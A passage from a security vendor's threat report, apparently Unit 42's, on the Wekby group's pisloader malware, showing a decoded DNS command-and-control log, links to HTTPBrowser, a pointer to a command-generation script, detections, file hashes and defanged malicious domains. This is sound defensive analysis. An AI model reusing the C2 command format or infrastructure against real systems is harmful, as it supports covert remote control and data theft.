00:21:34|391640|39^1|BOOTSECT.BAK|2015\/03\/26 16:35:39|8192|39^1|config.sys|2009\/06\/10 21:42:20|10|32^0|Documents and Settings|2009\/07\/14 04:53:55|0|9238^1|Example.log|2016\/02\/09 20:17:55|0|32^1|pagefile.sys|2016\/04\/25 14:09:20|1660411904|38^0|PerfLogs|2009\/07\/14 02:37:05|0|16^0|Program Files|2016\/02\/29 15:59:43|0|17^0|ProgramData|2016\/02\/02 17:28:04|0|8210^0|Python27|2016\/02\/25 16:39:37|0|16^0|Recovery|2015\/03\/26 14:39:57|0|8214^0|System Volume Information|2016\/02\/29 16:00:19|0|22^0|Users|2015\/03\/26 14:39:58|0|17^0|Windows|2016\/02\/12 10:20:21|0|16^^end^<\/textarea><\/p>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\" readability=\"2.5\">\n<tr class=\"crayon-row\" readability=\"5\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<p>1<\/p>\n<p>2<\/p>\n<p>3<\/p>\n<p>4<\/p>\n<p>5<\/p>\n<p>6<\/p>\n<p>7<\/p>\n<p>8<\/p>\n<p>9<\/p>\n<p>10<\/p>\n<\/div>\n<\/td>\n<td class=\"crayon-code\" readability=\"13.5\">\n<div class=\"crayon-pre\" readability=\"26\">\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Sending <\/span><span class=\"crayon-v\">Command<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">list<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Encoded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">CNRUXG5BAIM5FY<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">QKTUMGAGLAGB6CIUTFMN4WG3DFFZBGS3T4GIYDCNJPGAZS6MRW<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">EKNPMGAGL0EAYTIORUGA5DKN34GB6DEMS6<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">RKMAMGAGLAGF6GC5LUN5SXQZLDFZRGC5D4GIYDAOJPGA3C6MJQ<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">NMSIMGAGL0EAZDCORUGI5DEMD4GI2HYMZSLY<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">OHRWMGAGLAGB6EE33POR6DEMBRGUXTAMZPGI3CAMJWHIZDIORQ<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">DPDUMGAGL0GJ6DA7BSGJPA<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e \">WIKGMGAGLAGF6GE33PORWWO4T4GIYDCNBPGA3C6MRYEAYDAORS<\/span><\/p>\n<p><span class=\"crayon-e \">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e \">Truncated*<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Decoded <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">Recycle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Bin<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">57<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">22<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">autoexec<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bat<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2009<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">06<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">42<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">Boot<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">22<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">bootmgr<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2014<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">06<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">34<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">391640<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">39<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">BOOTSECT<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">BAK<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">35<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">39<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">8192<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">39<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">config<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2009<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">06<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">42<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-e\">Documents <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Settings<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2009<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">55<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">9238<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">Example<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">55<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">pagefile<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">25<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">1660411904<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">38<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">PerfLogs<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2009<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">37<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">05<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">59<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">ProgramData<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">8210<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">Python27<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">25<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">39<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">37<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">Recovery<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">39<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">57<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">8214<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-e\">System <\/span><span class=\"crayon-e\">Volume <\/span><span class=\"crayon-v\">Information<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">22<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">Users<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">39<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">58<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-st\">end<\/span><span class=\"crayon-o\">^<\/span><\/p>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><!-- [Format Time: 0.0026 seconds] --><\/p>\n<p>The sifo command above uses the printf format string of \u2018l=%s&amp;c=%s&amp;o=%s\u2019. This is consistent with previous versions of HTTPBrowser, which is another malware family frequently used by the Wekby group.<\/p>\n<p>Additionally, a number of commands themselves, such as the \u2018list\u2019, \u2018drive\u2019, and \u2018upload\u2019 commands are consistent with HTTPBrowser. The formatted responses from these commands are also identical. A <a href=\"https:\/\/www.virustotal.com\/en\/file\/9995fe6ff112efb6de6498ace23f42b8d3689f3c890959728cbc888462b9ea0d\/analysis\/\" target=\"_blank\" rel=\"noopener\">known HTTPBrowser sample<\/a> was spotted with similar metadata as the discussed pisloader sample, which adds further credibility that pisloader is likely a variant of this malware family.<\/p>\n<p>Additionally, the code used to generate these commands is available via <a href=\"https:\/\/github.com\/pan-unit42\/public_tools\/tree\/master\/pisloader\/wekby_dns.py\" target=\"_blank\" rel=\"noopener\">GitHub<\/a>.<\/p>\n<h3>Conclusion<\/h3>\n<p>The Wekby group continues to target various high profile organizations using sophisticated malware. The pisloader malware family uses various novel techniques, such as using DNS as a C2 protocol, as well as making use of return-oriented programming and other anti-analysis tactics.<\/p>\n<p>Palo Alto Networks customers are protected against this threat in the following ways:<\/p>\n<ul>\n<li>WildFire correctly identifies all pisloader samples as malicious<\/li>\n<li>A <a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.Pisloader\" target=\"_blank\" rel=\"noopener\">pisloader AutoFocus tag<\/a> has been created in order to track this malware family<\/li>\n<li>All domains\/IPs used in this attack have been flagged as malicious.<\/li>\n<li>An IPS rule has been created to detect pisloader DNS traffic<\/li>\n<\/ul>\n<h3>Appendix<\/h3>\n<p><strong>External Resources<\/strong><\/p>\n<p><strong>SHA256 Hashes<\/strong><\/p>\n<p>da3261c332e72e4c1641ca0de439af280e064b224d950817a11922a8078b11f1<br \/>930772d6af8f43f62ea78092914fa8d6b03e8e3360dd4678eec1a3dda17206ed<br \/>6852ba95720af64809995e04f4818517ca1bd650bc42ea86d9adfdb018d6b274<br \/>9200f80c08b21ebae065141f0367f9c88f8fed896b0b4af9ec30fc98c606129b<br \/>4d62caef1ca8f4f9aead7823c95228a52852a1145ca6aaa58ad8493e042aed16<br \/>1b341dab023de64598d80456349db146aafe9b9e2ec24490c7d0ac881cecc094<br \/>456fffc256422ad667ca023d694494881baed1496a3067485d56ecc8fefbfaeb<\/p>\n<p><strong>Domains<\/strong><\/p>\n<p>ns1.logitech-usa[.]com<br \/>globalprint-us[.]com<br \/>intranetwabcam[.]com<br \/>login.access-mail[.]com<br \/>glb.it-desktop[.]com<br \/>local.it-desktop[.]com<br \/>hi.getgo2[.]com<\/p>\n<div class=\"article__subscribe mb-40 text-gray-400 bg-gray-200 rounded-lg\" readability=\"30.875\">\n<h4 class=\"h3 mb-10 text-black\">Get updates from <br class=\"d-sm-none\"> Palo Alto<br class=\"d-sm-none\"> Networks!<\/h4>\n<p>Sign up to receive the latest news, cyber threat intelligence and research from us<\/p>\n<p> <!-- \n\n<form action=\"https:\/\/app-guse4001.marketo.com\/index.php\/leadCapture\/save2\" method=\"post\" novalidate class=\"subscribe-form py-25\" name=\"Unit42_Subscribe\"> --> <\/div>\n<p> <a href=\"https:\/\/www.paloaltonetworks.com\/blog\/2016\/05\/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism\/\">Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This post is also available in: \u65e5\u672c\u8a9e (Japanese) We have<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[203,30,168,204,202,183,205],"tags":[208,38,169,209,206,207,210],"class_list":["post-1292","post","type-post","status-publish","format-standard","hentry","category-command-and-control","category-dns","category-malware","category-pisloader","category-threat-prevention","category-unit-42","category-wekby","tag-command-and-control","tag-dns","tag-malware","tag-pisloader","tag-threat-prevention","tag-unit-42","tag-wekby"],"featured_image_urls":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":"","chromenews-featured":"","chromenews-large":"","chromenews-medium":""},"author_info":{"display_name":"Palo Alto","author_link":"https:\/\/ddi.mohflo.net\/index.php\/author\/paloalto\/"},"category_info":"<a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/command-and-control\/\" rel=\"category tag\">command and control<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/dns\/\" rel=\"category tag\">DNS<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/malware\/\" rel=\"category tag\">Malware<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/pisloader\/\" rel=\"category tag\">pisloader<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/threat-prevention\/\" rel=\"category tag\">Threat Prevention<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/unit-42\/\" rel=\"category tag\">Unit 42<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/wekby\/\" rel=\"category tag\">Wekby<\/a>","tag_info":"Wekby","comment_count":"0","jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/posts\/1292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/comments?post=1292"}],"version-history":[{"count":1,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/posts\/1292\/revisions"}],"predecessor-version":[{"id":1390,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/posts\/1292\/revisions\/1390"}],"wp:attachment":[{"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/media?parent=1292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/categories?post=1292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/tags?post=1292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}